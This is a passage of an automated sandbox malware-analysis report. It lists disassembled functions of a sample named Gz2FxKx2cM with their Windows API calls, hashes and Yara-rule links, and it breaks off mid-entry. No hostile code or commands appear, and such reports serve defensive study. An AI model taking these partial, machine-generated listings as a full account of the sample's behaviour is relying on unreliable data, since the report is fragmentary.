                                          • Opcode ID: 6dd0f15e12f59f76a04ff6d1541a6ecc4e2f21ba0b1b22c5adac9e081ac06693
                                          • Instruction ID: 96ee51d9040d2db69eea679336417cc85054cdaf56cafad4dceb37df65c3fd82
                                          • Opcode Fuzzy Hash: 6dd0f15e12f59f76a04ff6d1541a6ecc4e2f21ba0b1b22c5adac9e081ac06693
                                          • Instruction Fuzzy Hash: EE215B71210209AFEF106F74DC90EBF77ADEB59368F204629FA109B2A0D7719C91A760
                                          Function 00966D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00966DBC
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00966DEF
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00966E01
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00966E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ba1f2b1ba7d50de441cd739d920566e76caf8137a45e3de3f2dc80b22c87e079
                                          • Instruction ID: 9a327e375f68f2ac9b59e134bb9fab3bfbc7512db435c4413525dee599b795cc
                                          • Opcode Fuzzy Hash: ba1f2b1ba7d50de441cd739d920566e76caf8137a45e3de3f2dc80b22c87e079
                                          • Instruction Fuzzy Hash: F621AF75600209ABDB209F29DC55B9A7BFCEF84720F204A29FDA1D72D0DB71A960DB50
                                          Function 00966E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00966E89
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00966EBB
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00966ECC
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00966F06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ed89b58b2a8924d2cbd0073467a2d20f12c1194975605cc67f8d9bfbfe8b3592
                                          • Instruction ID: 01d5b9086948a285028a1ec79b21e1f76b34132c816ea2eb3cc9b3ab25bb15ba
                                          • Opcode Fuzzy Hash: ed89b58b2a8924d2cbd0073467a2d20f12c1194975605cc67f8d9bfbfe8b3592
                                          • Instruction Fuzzy Hash: 5221AF796007059BDB219F69DC44AAA77A8EF85730F200B19FDF1D72D0DB71A860CB50
                                          Function 0096AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096AC54
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0096ACA8
                                          • __swprintf.LIBCMT ref: 0096ACC1
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0098F910), ref: 0096ACFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 2fb12a55f8124b789e62f9d286b9f8a54df434e4fd130647557c281adf13b01b
                                          • Instruction ID: d914f9394245eb06a95ed2895d3417d6e73f81bd779a0995d53fddcfb9da875d
                                          • Opcode Fuzzy Hash: 2fb12a55f8124b789e62f9d286b9f8a54df434e4fd130647557c281adf13b01b
                                          • Instruction Fuzzy Hash: 60217430600109AFCB10DF65C945EAE77B8EF89314B004069F905AB352DB35EA41DB21
                                          Function 00961AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00961B19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 8c633baebcc6d2e3811397e500b28f0cc91262c3a37ad11221423191a8bcfdd4
                                          • Instruction ID: f7b4c6e6983d5826ba40118f90f6ee0bd3a07c144dfda7c34efd1441863430bc
                                          • Opcode Fuzzy Hash: 8c633baebcc6d2e3811397e500b28f0cc91262c3a37ad11221423191a8bcfdd4
                                          • Instruction Fuzzy Hash: CD1184309102188FCF10EFA4E9959FFB7B8FFA5304B5444A9E815A7296EB729D06CF50
                                          Function 0097EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0097EC07
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0097EC37
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0097ED6A
                                          • CloseHandle.KERNEL32(?), ref: 0097EDEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 2af433a5ab4981b21016f87077436676afb101dd5d9f1c4968c0733f3139f7ee
                                          • Instruction ID: 4a968ef64aadc28e8ef877c574d22a4aa76891a84530581826d589ca6a55f659
                                          • Opcode Fuzzy Hash: 2af433a5ab4981b21016f87077436676afb101dd5d9f1c4968c0733f3139f7ee
                                          • Instruction Fuzzy Hash: 8C813DB16047009FD760EF29C886F2AB7E5AF88710F14C95DF9999B3D2DAB0AC41CB51
                                          Function 0092541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction ID: c35e7b7325a98a20f72b7937a118d1685d8b08434bfc1ffe4aca7ab35d8446a7
                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction Fuzzy Hash: 8B51D970A00B25DBCB249F69F880A6EB7BAAF40335F258729F835962D8D774DD508F40
                                          Function 00980037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009800FD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0098013C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00980183
                                          • RegCloseKey.ADVAPI32(?,?), ref: 009801AF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 009801BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: d5eaf18a030c6d5e2de155f8bf9c6cc6875b88877df93af4ded7019571599f7b
                                          • Instruction ID: b6dcdc693ac58044ccc88682ac228ff269b21343406f2fe1e7b458877b7aef22
                                          • Opcode Fuzzy Hash: d5eaf18a030c6d5e2de155f8bf9c6cc6875b88877df93af4ded7019571599f7b
                                          • Instruction Fuzzy Hash: 64516A71208204AFD704EF68C895F6AB7E9FFC4314F40892DF596872A2DB35E949CB52
                                          Function 0097D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0097D927
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0097D9AA
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0097D9C6
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0097DA07
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0097DA21
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 2bba0b19ab3675ff6c99a3c37938113ee5e977cdd6291e9e60e2be1ba5af5c0a
                                          • Instruction ID: 01db8c4d32118ada55f0f1194a3cda115a06cd8a9bacfe21c1f39d9eb63e31c7
                                          • Opcode Fuzzy Hash: 2bba0b19ab3675ff6c99a3c37938113ee5e977cdd6291e9e60e2be1ba5af5c0a
                                          • Instruction Fuzzy Hash: 50512636A05209DFCB00EFA8C484AADBBB9FF49320B15C065E959AB352D731AD45CF90
                                          Function 0096E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0096E61F
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0096E648
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0096E687
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0096E6AC
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0096E6B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 64ea96ae41a171efed25d4f1deb71d32610532b9f8fc8cd53fe7a1e6dc316966
                                          • Instruction ID: 6f14870f296476b086bd7a5ed2df02708a1e50c4146533424c033262cd133fc0
                                          • Opcode Fuzzy Hash: 64ea96ae41a171efed25d4f1deb71d32610532b9f8fc8cd53fe7a1e6dc316966
                                          • Instruction Fuzzy Hash: D2510D75A00105DFCB01EF64C981AAEBBF5EF49314F1480A5E819AB3A2CB31ED11DF51
                                          Function 0098A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6cf144673e037e00ed2b2ad5174409019149f32f785b099fec0a860b13d07a48
                                          • Instruction ID: f3da8b22816040ef3e97c9e4c8dc632c7eb9594aab1c6220212b4671e04b94da
                                          • Opcode Fuzzy Hash: 6cf144673e037e00ed2b2ad5174409019149f32f785b099fec0a860b13d07a48
                                          • Instruction Fuzzy Hash: 47418235908104AFE720EF28CC5CFA9BBA8EB09310F150666F916A73E1C774AD51EB51
                                          Function 00902344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00902357
                                          • ScreenToClient.USER32(009C57B0,?), ref: 00902374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00902399
                                          • GetAsyncKeyState.USER32(00000002), ref: 009023A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 2e5eafc80e45f7fed3d1a7887fae36e5f8d46b975370559e44eac0f200b72735
                                          • Instruction ID: 76f42237c6cd1cdb7f96bfe4d281c4d9d879739d8cfea9a604cd94c6ff5dce4e
                                          • Opcode Fuzzy Hash: 2e5eafc80e45f7fed3d1a7887fae36e5f8d46b975370559e44eac0f200b72735
                                          • Instruction Fuzzy Hash: 1C418F75608119FFCF199F68C848AE9FB79FB05764F20431AF829A62E0C7349950DF91
                                          Function 009563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009563E7
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00956433
                                          • TranslateMessage.USER32(?), ref: 0095645C
                                          • DispatchMessageW.USER32(?), ref: 00956466
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00956475
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: 734c5b14fa3930258b5aea0842addaf69d2ee2fd5e162f30c6460faf6f7b52b8
                                          • Instruction ID: 641b3d3240d6bfd89fc1701be0b490bb9c3120fa442295121b9e0f71379f1af0
                                          • Opcode Fuzzy Hash: 734c5b14fa3930258b5aea0842addaf69d2ee2fd5e162f30c6460faf6f7b52b8
                                          • Instruction Fuzzy Hash: 9431B231914646AFDB64CF72DC44FB67BACAB01302F940169E821C31B1E735A4CDE760
                                          Function 00958A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00958A30
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00958ADA
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00958AE2
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00958AF0
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00958AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 09b4780c3e0680b0d7eecc4b820f6a27f5f29b594dcb3d75b704c3cbe7cbe266
                                          • Instruction ID: 59c3b44a881ed48b07bc3fec56995b1c581290ffd9a4463218e2ce386987718c
                                          • Opcode Fuzzy Hash: 09b4780c3e0680b0d7eecc4b820f6a27f5f29b594dcb3d75b704c3cbe7cbe266
                                          • Instruction Fuzzy Hash: 8A31EE71500219EBDF14CFA9D94CA9F3BB9EB04316F10822AFD25EB2D0C7B09918DB90
                                          Function 0095B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0095B204
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0095B221
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0095B259
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0095B27F
                                          • _wcsstr.LIBCMT ref: 0095B289
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: a87ab60dc2abd4bebcfc4c5ac5939bf245d8da4b4514ff61e0df67dd5c98cf84
                                          • Instruction ID: 96336b56f7c98c7d92c3f10b2124ddd93a0cb5a16d781a28efcd0ac8ea28ed74
                                          • Opcode Fuzzy Hash: a87ab60dc2abd4bebcfc4c5ac5939bf245d8da4b4514ff61e0df67dd5c98cf84
                                          • Instruction Fuzzy Hash: AC21F532208214BAEB159B76AC09E7F7B9CDF99721F108129FC09DA1A1EF659C4097A0
                                          Function 0098B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098B192
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0098B1B7
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0098B1CF
                                          • GetSystemMetrics.USER32(00000004), ref: 0098B1F8
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00970E90,00000000), ref: 0098B216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: c4636130f05ea28a24e1ca0b7ff24b1893a564bdd17381ad20aa9a4469f905eb
                                          • Instruction ID: 22c6939b249072fd4f742ef752636b90bcd871d6d53451aa84f043acfa677d53
                                          • Opcode Fuzzy Hash: c4636130f05ea28a24e1ca0b7ff24b1893a564bdd17381ad20aa9a4469f905eb
                                          • Instruction Fuzzy Hash: 5E219471928251AFCB10AF38DC18A6A37A8FB15321F194728F932D73E0D73098519B90
                                          Function 00959307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00959320
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00959352
                                          • __itow.LIBCMT ref: 0095936A
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00959392
                                          • __itow.LIBCMT ref: 009593A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
